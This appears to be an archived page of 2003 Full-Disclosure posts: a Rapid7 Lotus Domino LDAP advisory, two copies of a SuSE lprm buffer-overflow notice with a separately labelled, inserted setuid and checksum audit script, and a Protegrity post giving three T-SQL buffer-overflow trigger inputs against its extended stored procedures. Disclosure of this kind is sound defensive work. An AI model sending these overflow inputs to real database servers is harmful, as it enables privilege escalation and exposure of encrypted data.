[Full-Disclosure] R7-0012: Lotus Notes/Domino R6-beta PROTOS LDAP Denial of Service Regression

2003-03-13 Thread Rapid 7 Security Advisories
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

___
 Rapid7, Inc. Security Advisory

  Visit http://www.rapid7.com/ to download NeXpose, the
   world's most advanced vulnerability scanner.
   Linux and Windows 2000/XP versions are available now!
___

Rapid7 Advisory R7-0012
Lotus Notes/Domino R6-beta PROTOS LDAP Denial of Service Regression

   Published:  March 12, 2003
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0012.html

   CVE:            CAN-2001-1311 (regression)
   CERT Note:      583184 (regression)
   CERT Advisory:  CA-2001-18 (regression)
   Lotus SPR:      DWUU4W6NC8 (regression)
   Bugtraq ID:     7039

1. Affected system(s):

   KNOWN VULNERABLE:
o Lotus Notes/Domino R6 pre-release and beta versions
o Lotus Domino R5.0.7 and earlier

   NOT VULNERABLE:
o Lotus Notes/Domino R6.0 Gold
o Lotus Notes/Domino R6.0.1
o Lotus Notes/Domino R5.0.7a through R5.0.12

2. Summary

   In July 2001, the PROTOS protocol testing group at the University
   of Oulu in Finland released an LDAP protocol test suite that exposed
   flaws in LDAP implementations from multiple vendors.  [1]

   Lotus Domino R5.0.7 and earlier were affected by the PROTOS LDAP
   issues, resulting in buffer overflows and denial of service against
   the Domino server.  Lotus addressed these issues in Domino R5.0.7a,
   released May 18th 2001.  [2]

   While regression testing the pre-release and beta versions of Lotus
   Domino R6 with the PROTOS LDAP test suite, we found that these
   releases were vulnerable to the issues PROTOS discovered.

3. Vendor status and information

   Lotus
   http://www.lotus.com/
   http://www.ibm.com/

   Lotus was notified and they have fixed this vulnerability.  Lotus
   originally tracked these issues as SPR #DWUU4W6NC8 and are tracking
   the R6 beta issues with this SPR.  [3]

   See the References section for more information.

4. Solution

   Users running R6 beta and pre-release builds should upgrade to R6.0
   Gold or higher.  Due to other vulnerabilities discovered in R6.0
   Gold, you should consider upgrading to R6.0.1, which was released in
   February 2003.

   Users running R5.0.7a and higher are not affected.

   Domino incremental installers may be downloaded from the following
   URL (which has been wrapped):

  http://www14.software.ibm.com
 /webapp/download/search.jsp?go=yrs=ESD-DMNTSRVRisb=r

5. Detailed analysis

   Credit for discovery of this vulnerability goes to the PROTOS
   project.  Please see their LDAP test suite page for more
   information. [1]

6. References

   [1] PROTOS - Security Testing of Protocol Implementations
   http://www.ee.oulu.fi/research/ouspg/protos/

   [2] Lotus statement about LDAP vulnerability fixes
   http://www.kb.cert.org/vuls/id/JPLA-4WESN5

   [3] Lotus SPR #DWUU4W6NC8
   http://www.notes.net/r5fixlist.nsf/Search!SearchViewQuery=DWUU4W6NC8

7. Contact Information

   Rapid7 Security Advisories
   Email:  [EMAIL PROTECTED]
   Web:    http://www.rapid7.com/
   Phone:  +1 (212) 558-8700

8. Disclaimer and Copyright

   Rapid7, Inc. is not responsible for the misuse of the information
   provided in our security advisories.  These advisories are a service
   to the professional security community.  There are NO WARRANTIES
   with regard to this information.  Any application or distribution of
   this information constitutes acceptance AS IS, at the user's own
   risk.  This information is subject to change without notice.

   This advisory Copyright (C) 2003 Rapid7, Inc.  Permission is
   hereby granted to redistribute this advisory, providing that no
   changes are made and that the copyright notices and disclaimers
   remain intact.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0

iQA/AwUBPnA3PyT52JC2U8wAEQLHPQCcDEBlGignyH8zUjKDYkFKn67tZckAn01q
iFqZh3acdOC/aMBSRZYWKBlO
=ScAz
-----END PGP SIGNATURE-----


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] SuSE Security Announcement: lprold (SuSE-SA:2003:0014)

2003-03-13 Thread Thomas Biege
-----BEGIN PGP SIGNED MESSAGE-----

__

SuSE Security Announcement

Package:                lprold
Announcement-ID:        SuSE-SA:2003:0014
Date:                   Thursday, Mar 13th 2003 16:00 MET
Affected products:  7.1, 7.2, 7.3
SuSE eMail Server 3.1
SuSE eMail Server III
SuSE Firewall Adminhost VPN
SuSE Linux Admin-CD for Firewall
SuSE Firewall on CD 2 - VPN
SuSE Firewall on CD 2
SuSE Linux Enterprise Server for S/390
SuSE Linux Connectivity Server
SuSE Linux Enterprise Server 7
SuSE Linux Office Server
Vulnerability Type: local privilege escalation
Severity (1-10):        3
SuSE default package:   yes
Cross References:

Content of this advisory:
1) security vulnerability resolved: buffer overflow in lprm
   problem description, discussion, solution and upgrade information
2) pending vulnerabilities, solutions, workarounds:
- ethereal
- qpopper
- XFree4
- sendmail
- apcupsd
- snort
- file
- zlib
- vnc
3) standard appendix (further information)

__

1)  problem description, brief discussion, solution, upgrade information

The lprm command of the printing package lprold shipped till SuSE 7.3
contains a buffer overflow. This buffer overflow can be exploited by
a local user, if the printer system is set up correctly, to gain root
privileges.
lprold is installed as a default package and has the setuid bit set.

As a temporary workaround you can disable the setuid bit of lprm by
executing the following tasks as root:
  - add /usr/bin/lprm  root.root 755 to /etc/permissions.local
  - run 'chkstat -set /etc/permissions.local'
Another way would be to just allow trusted users to run lprm by
executing the following tasks as root:
  - add /usr/bin/lprm  root.trusted 4755 to /etc/permissions.local
  - run 'chkstat -set /etc/permissions.local'

Please download the update package for your distribution and verify its
integrity by the methods listed in section 3) of this announcement.
Then, install the package using the command rpm -Fhv file.rpm to apply
the update.
Our maintenance customers are being notified individually. The packages
are being offered to install from the maintenance web.

Intel i386 Platform:



SuSE-7.3:
ftp://ftp.suse.com/pub/suse/i386/update/7.3/n1/lprold-3.0.48-408.i386.rpm
  52a301d88fce69dcf2de53c86d70f51e
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/lprold-3.0.48-408.src.rpm
  9907cc1bd077493d0bb1a0e646a20022

SuSE-7.2:
ftp://ftp.suse.com/pub/suse/i386/update/7.2/n1/lprold-3.0.48-407.i386.rpm
  364faa0d5266e36d7db90ac223137f2d
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/lprold-3.0.48-407.src.rpm
  eff9c0ff34e0ad0d313477b998964a26

SuSE-7.1:
ftp://ftp.suse.com/pub/suse/i386/update/7.1/n1/lprold-3.0.48-407.i386.rpm
  5454e913e660a6d409a200a3ddd19f8b
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/lprold-3.0.48-407.src.rpm
  ad22928b988b8ed055ab5698e15479e4



Sparc Platform:

SuSE-7.3:
ftp://ftp.suse.com/pub/suse/sparc/update/7.3/n1/lprold-3.0.48-273.sparc.rpm
  88a5f8cf7db0c123776b4fa9f47e9205
source rpm(s):
ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/lprold-3.0.48-273.src.rpm
  83860e8bd337b3617f8c59605c8ff847




AXP Alpha Platform:

SuSE-7.1:
ftp://ftp.suse.com/pub/suse/axp/update/7.1/n1/lprold-3.0.48-270.alpha.rpm
  651c6141e07560763f07b74c1506d668
source rpm(s):
ftp://ftp.suse.com/pub/suse/axp/update/7.1/zq1/lprold-3.0.48-270.src.rpm
  96b67fb75ae0c4702f6e881c665f81dd



PPC Power PC Platform:

SuSE-7.3:
ftp://ftp.suse.com/pub/suse/ppc/update/7.3/n1/lprold-3.0.48-297.ppc.rpm
  8caba2cc70f7edfa96c23ac3bab3e8bf
source rpm(s):
ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/lprold-3.0.48-297.src.rpm
  b1741e591445aef7b8aaf83a8a4a34ef

SuSE-7.1:
ftp://ftp.suse.com/pub/suse/ppc/update/7.1/n1/lprold-3.0.48-297.ppc.rpm
  1b86cd16e6e5b8e63252b9c9a6acd5b9
source rpm(s):
ftp://ftp.suse.com/pub/suse/ppc/update/7.1/zq1/lprold-3.0.48-297.src.rpm
  e44adcc90b604bc4dc81b43e57f6e161




__

2)  Pending vulnerabilities in 

[Full-Disclosure] SuSE Security Announcement: lprold (SuSE-SA:2003:0014)

2003-03-13 Thread Thomas Biege

Republished because of a mistake. Thanks to an attentive user.


-----BEGIN PGP SIGNED MESSAGE-----

__

SuSE Security Announcement

Package:                lprold
Announcement-ID:        SuSE-SA:2003:0014
Date:                   Thursday, Mar 13th 2003 16:58 MET
Affected products:  7.1, 7.2, 7.3
SuSE eMail Server 3.1
SuSE eMail Server III
SuSE Firewall Adminhost VPN
SuSE Linux Admin-CD for Firewall
SuSE Firewall on CD 2 - VPN
SuSE Firewall on CD 2
SuSE Linux Enterprise Server for S/390
SuSE Linux Connectivity Server
SuSE Linux Enterprise Server 7
SuSE Linux Office Server
Vulnerability Type: local privilege escalation
Severity (1-10):        3
SuSE default package:   yes
Cross References:

Content of this advisory:
1) security vulnerability resolved: buffer overflow in lprm
   problem description, discussion, solution and upgrade information
2) pending vulnerabilities, solutions, workarounds:
- ethereal
- qpopper
- XFree4
- sendmail
- apcupsd
- snort
- file
- zlib
- vnc
3) standard appendix (further information)

__

1)  problem description, brief discussion, solution, upgrade information

The lprm command of the printing package lprold shipped till SuSE 7.3
contains a buffer overflow. This buffer overflow can be exploited by
a local user, if the printer system is set up correctly, to gain root
privileges.
lprold is installed as a default package and has the setuid bit set.

As a temporary workaround you can disable the setuid bit of lprm by
executing the following tasks as root:
  - add /usr/bin/lprm  root.root 755 to /etc/permissions.local
  - run 'chkstat -set /etc/permissions.local'
Another way would be to just allow trusted users to run lprm by
executing the following tasks as root:
  - add /usr/bin/lprm  root.trusted 4750 to /etc/permissions.local
  - run 'chkstat -set /etc/permissions.local'

Please download the update package for your distribution and verify its
integrity by the methods listed in section 3) of this announcement.
Then, install the package using the command rpm -Fhv file.rpm to apply
the update.
Our maintenance customers are being notified individually. The packages
are being offered to install from the maintenance web.

Intel i386 Platform:



SuSE-7.3:
ftp://ftp.suse.com/pub/suse/i386/update/7.3/n1/lprold-3.0.48-408.i386.rpm
  52a301d88fce69dcf2de53c86d70f51e
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/lprold-3.0.48-408.src.rpm
  9907cc1bd077493d0bb1a0e646a20022

SuSE-7.2:
ftp://ftp.suse.com/pub/suse/i386/update/7.2/n1/lprold-3.0.48-407.i386.rpm
  364faa0d5266e36d7db90ac223137f2d
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/lprold-3.0.48-407.src.rpm
  eff9c0ff34e0ad0d313477b998964a26

SuSE-7.1:
ftp://ftp.suse.com/pub/suse/i386/update/7.1/n1/lprold-3.0.48-407.i386.rpm
  5454e913e660a6d409a200a3ddd19f8b
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/lprold-3.0.48-407.src.rpm
  ad22928b988b8ed055ab5698e15479e4



Sparc Platform:

SuSE-7.3:
ftp://ftp.suse.com/pub/suse/sparc/update/7.3/n1/lprold-3.0.48-273.sparc.rpm
  88a5f8cf7db0c123776b4fa9f47e9205
source rpm(s):
ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/lprold-3.0.48-273.src.rpm
  83860e8bd337b3617f8c59605c8ff847




AXP Alpha Platform:

SuSE-7.1:
ftp://ftp.suse.com/pub/suse/axp/update/7.1/n1/lprold-3.0.48-270.alpha.rpm
  651c6141e07560763f07b74c1506d668
source rpm(s):
ftp://ftp.suse.com/pub/suse/axp/update/7.1/zq1/lprold-3.0.48-270.src.rpm
  96b67fb75ae0c4702f6e881c665f81dd



PPC Power PC Platform:

SuSE-7.3:
ftp://ftp.suse.com/pub/suse/ppc/update/7.3/n1/lprold-3.0.48-297.ppc.rpm
  8caba2cc70f7edfa96c23ac3bab3e8bf
source rpm(s):
ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/lprold-3.0.48-297.src.rpm
  b1741e591445aef7b8aaf83a8a4a34ef

SuSE-7.1:
ftp://ftp.suse.com/pub/suse/ppc/update/7.1/n1/lprold-3.0.48-297.ppc.rpm
  1b86cd16e6e5b8e63252b9c9a6acd5b9
source rpm(s):
ftp://ftp.suse.com/pub/suse/ppc/update/7.1/zq1/lprold-3.0.48-297.src.rpm
  e44adcc90b604bc4dc81b43e57f6e161




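The following is an added example and is not part of either SuSE announcement above. It is a small POSIX shell audit for the lprm workaround both announcements describe: it reports whether a binary still carries the setuid bit and who owns it, tests whether users outside the owning group can execute it (mode 4755 leaves that possible, which is why the republished announcement changes the "trusted" group variant to 4750), and verifies an update package's MD5 against the digest printed in the announcement before it would be installed with rpm -Fhv. It assumes GNU md5sum and POSIX find, ls and awk; /usr/bin/lprm is the announcement's path, and the digest passed to verify_md5 would be copied from the package list.

```shell
#!/bin/sh
# Added example, not part of the SuSE announcement. Assumes GNU md5sum and
# POSIX find/ls/awk. Checks the state the lprm workaround leaves a binary in
# and verifies an update package's MD5 before it is installed with rpm -Fhv.

# Report the setuid state of a file: setuid-root, setuid-other, not-setuid
# or missing. Always returns 0 so it can be used in command substitution.
setuid_state() {
    f=$1
    if [ ! -e "$f" ]; then
        echo missing
    elif [ -n "$(find "$f" -prune -perm -4000 2>/dev/null)" ]; then
        owner=$(ls -ld "$f" | awk '{print $3}')
        if [ "$owner" = root ]; then echo setuid-root; else echo setuid-other; fi
    else
        echo not-setuid
    fi
}

# Return 0 when users outside the owner and group can execute the file.
# Mode 4755 leaves this true, which is why restricting lprm to the "trusted"
# group needs 4750 (the value in the republished announcement).
others_can_execute() {
    [ -n "$(find "$1" -prune -perm -0001 2>/dev/null)" ]
}

# Return 0 when the file's MD5 equals the digest printed in the announcement.
verify_md5() {
    actual=$(md5sum "$1" | awk '{print $1}')
    [ "$actual" = "$2" ]
}

# Refuse to install unless the checksum matches. The rpm line is the
# announcement's install command and is left commented so the check has
# no side effects.
safe_update() {
    pkg=$1; expected=$2
    if verify_md5 "$pkg" "$expected"; then
        echo "checksum ok: $pkg"
        # rpm -Fhv "$pkg"
        return 0
    fi
    echo "checksum mismatch for $pkg, refusing to install" >&2
    return 1
}

# Usage on the announcement's path (prints "missing" on a host without lprold):
echo "/usr/bin/lprm: $(setuid_state /usr/bin/lprm)"
```

After applying either workaround, `setuid_state /usr/bin/lprm` should print not-setuid (first variant) or setuid-root with `others_can_execute /usr/bin/lprm` failing (second variant, mode 4750); if it still succeeds, the 4755 value from the first posting was used.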

[Full-Disclosure] Protegrity buffer overflow

2003-03-13 Thread sss sss

Additional details can be found at http://www.kb.cert.org/vuls/id/247545

There is a company that does encryption of databases called Protegrity. They use extended stored procedures to do the encryption and decryption. I tested 3 of the extended stored procedures and found all 3 vulnerable to buffer overflows.

DECLARE @test varchar(8000)
SET @test = (SELECT replicate('x',1926))
execute master.dbo.xp_pty_checkusers 'as', @test

DECLARE @test varchar(8000)
SET @test = (SELECT replicate('x',850))
execute master.dbo.xp_pty_insert @test, @test, @test

DECLARE @test varchar(8000)
SET @test = (SELECT replicate('x',850))
execute master.dbo.xp_pty_select @test, @test, @test

These security holes are fully exploitable and would allow an attacker to perform any of the following:
1) become sa on the box
2) gain control of the operating system
3) decrypt the sensitive data Protegrity is encrypting

If you have this software, contact the vendor for the patch.